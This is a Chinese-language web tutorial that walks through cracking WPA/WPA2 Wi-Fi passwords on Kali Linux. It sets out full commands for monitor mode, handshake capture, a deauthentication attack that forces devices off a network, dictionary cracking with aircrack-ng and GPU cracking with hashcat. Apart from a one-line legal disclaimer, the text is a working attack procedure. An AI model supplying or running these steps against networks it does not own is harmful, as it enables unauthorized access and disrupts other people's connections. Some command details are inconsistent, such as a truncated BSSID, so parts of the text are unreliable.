kali linux破解wifi圖文說明教程wpa/wpa2,kali linux使用圖文說明教程
發表時間:2023-07-19 來源:明輝站整理相關軟件相關文章人氣:
[摘要]Kali Linux能做很多事,但是它主要以滲透測試及’破解wifi密碼’聞名。如果你使用Macbook 請看 使用macbook破解WPA/WPA2 wifi密碼要求:安裝有Kali Linux的...
Kali Linux能做很多事,但是它主要以滲透測試及’破解wifi密碼’聞名。
如果你使用Macbook 請看 使用macbook破解WPA/WPA2 wifi密碼
要求:
安裝有Kali Linux的計算機
支持監控模式的網卡,筆記本電腦一般都支持
字典文件
時間和耐心
這種攻擊需要字典文件,一個好的字典至關重要。我以Kali Linux自帶的rockyou字典為例,位于/user/share/wordlists/rockyou.txt.gz。
使用前先解壓:
# gzip -d /usr/share/wordlists/rockyou.txt.gz
注意:破解其他人的wifi密碼是“犯罪”,so,don’t;我使用自己的無線路由器演示。
知道了攻擊方法,你自然就知道怎么防范了。
1)首先斷開連接的wifi。
在終端中執行:
# airmon-ng

上面命令列出了支持監控模式的無線網卡。如果沒有任何輸出,表示無線網卡不支持監控模式。你可以看到我的wlan0支持監控模式。
2)開啟無線網卡的監控模式
# airmon-ng start wlan0

執行成功之后網卡接口變為wlan0mon;可以使用ifconfig命令查看。
3)查看wifi網絡
# airodump-ng wlan0mon
上面列出了周圍的wifi和它們的詳細信息,包括信號強度、加密類型、頻道等。要記住要破解wifi的頻道號和BSSID。
按Ctrl-C結束。
4)抓取握手包
使用網卡的監聽模式抓取周圍的無線網絡數據包。其中,對我們最重要的數據包是:包含密碼的包-也叫握手包。當有新用戶或斷開用戶自動連接wifi時,會發送握手包。
開始抓包:
# airodump-ng -c 6 --bssid BC:46:99:66:F9:84 -w ~/ wlan0mon
參數解釋:
-c指定頻道號
–bssid指定路由器bssid
-w指定抓取的數據包保存位置

5)強制連接到wifi的設備重新連接路由器
現在我們只要等用戶連接/重連接wifi了,運氣不好也許要很長時間。
但是我們是不會等的,這不是耐心黑客該干的事。有一個叫aireplay-ng的工具,它可以強制用戶斷開wifi連接;原理是,給連接到wifi的一個設備發送一個deauth(反認證)包,讓那個設備斷開wifi,隨后它自然會再次連接wifi。
aireplay-ng的生效前提是,wifi網絡中至少有一個連接的設備。從上圖(4)可以看到哪些設備連接到了wifi,STATION就是連接設備的MAC地址,記住一個。
aircrack-ng官網
打開新終端執行:
aireplay-ng -0 2 -a 46:99:66:F9:84 -c B8:E8:56:09:CC:9C wlan0mon
參數解釋:
-0表示發起deauthentication攻擊
-a指定無線路由器BSSID
-c指定強制斷開的設備

如果成功:

按Ctrl-C結束抓包。
我們已經得到了想要的握手包了,可以結束無線網卡的監控模式了:
# airmon-ng stop wlan0mon

6) 開始破解密碼
# aircrack-ng -a2 -b C8:3A:35:30:3E:C8 -w /usr/share/wordlists/rockyou.txt ~/*.cap
參數解釋:
-a2代表WPA的握手包
-b指定要破解的wifi BSSID。
-w指定字典文件
最后是抓取的包

可選)使用顯卡的運算能力
如果你有一個強大的GPU,為什么不使用GPU跑字典呢?
Hashcat可以借助GPU的運算力破解各種不同算法的hash值。
下載時要注意選擇正確的顯卡類型(AMD、NVidia)。Kali Linux自帶這個工具。
在破解cap文件之前,要把它轉換為hccap文件:
# aircrack-ng file.cap -J out.hccap
使用GPU破解hash:
# hashcat -m 2500 out.hccap 字典文件
大多數人在上網的時候,都會瀏覽網頁提供給我們的信息。